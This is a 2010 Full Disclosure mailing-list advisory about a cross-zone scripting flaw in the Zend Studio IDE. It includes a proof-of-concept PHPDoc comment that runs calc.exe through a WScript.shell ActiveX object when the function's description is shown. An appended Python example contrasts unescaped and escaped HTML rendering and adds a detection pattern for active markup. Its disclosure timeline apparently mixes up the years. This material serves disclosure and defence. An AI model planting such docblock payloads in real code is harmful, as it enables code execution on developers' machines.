Full Disclosure mailing list archives
Zend studio location Cross-Domain Scripting Vulnerability
From: IEhrepus <5up3rh3i () gmail com>
Date: Sat, 10 Jul 2010 13:44:00 +0800
Author: www.80vul.com [Email: saiy1986 () gmail com]
Release Date: 2010/7/10
References: http://80vul.com/Zend%20studio/Zend%20studio%20location%20Cross.htm

Zend Studio is a commercial, proprietary integrated development environment (IDE) for PHP developed by Zend Technologies, based on the PHP Development Tools (PDT) plugin for the Eclipse platform (the PDT project is led by Zend).

We found a security bug in Zend Studio [version >6.0]: the description of a function in a PHP script is not escaped or HTML-encoded, so an attacker who injects evil codz into a function's description can execute arbitrary HTML and script code. This vul is a "Cross-Zone Scripting" vul, so successful exploitation allows execution of arbitrary code on the user's system.

DEMO:

<?php
/**
 * <script>new ActiveXObject("WScript.shell").Run('calc.exe',1,true);</script>");
 */
function a()
{
}

Then open the description of function a() [type the word "a" or move your mouse over it], and calc.exe will be run.

Disclosure Timeline:
2009/07/08 - Found this Vulnerability
2009/07/10 - Public Disclosure

--
hitest
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
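The root cause described in the advisory (docblock text placed into an HTML view without encoding) and its mitigation, as an added example that is not part of the original post and is not Zend Studio's code. All function names are hypothetical and the PHP sample is constructed; it uses a harmless `<script>` marker.

```python
import html
import re

# Constructed sample: a PHP file whose PHPDoc description carries markup.
SAMPLE_PHP = """<?php
/**
 * Adds two numbers. <script>marker()</script>
 * @param int $a
 */
function add($a, $b) { return $a + $b; }
"""

# A /** ... */ block directly followed by a function declaration.
DOCBLOCK = re.compile(r"/\*\*(.*?)\*/\s*function\s+(\w+)", re.DOTALL)


def docblock_descriptions(php_source):
    """Map function name -> free-text description from its PHPDoc block."""
    found = {}
    for body, name in DOCBLOCK.findall(php_source):
        # Strip the leading " * " decoration from every comment line.
        lines = [re.sub(r"^\s*\*\s?", "", ln) for ln in body.splitlines()]
        # Keep description lines only; @tags are handled elsewhere.
        desc = [ln.strip() for ln in lines
                if ln.strip() and not ln.lstrip().startswith("@")]
        found[name] = " ".join(desc)
    return found


def hover_html_unescaped(name, desc):
    """The flawed pattern: source text pasted into HTML as-is."""
    return "<div class='doc'><b>%s()</b><p>%s</p></div>" % (name, desc)


def hover_html_escaped(name, desc):
    """Hardened: every source-derived string is HTML-encoded first."""
    return "<div class='doc'><b>%s()</b><p>%s</p></div>" % (
        html.escape(name, quote=True), html.escape(desc, quote=True))


def has_active_markup(fragment):
    """Crude regression check for tags or handlers an HTML view would run."""
    pattern = r"<\s*(script|iframe|object|embed)\b|\son\w+\s*="
    return re.search(pattern, fragment, re.IGNORECASE) is not None
```

The `has_active_markup` check is only a test aid for the renderer; the mitigation itself is the unconditional encoding in `hover_html_escaped`.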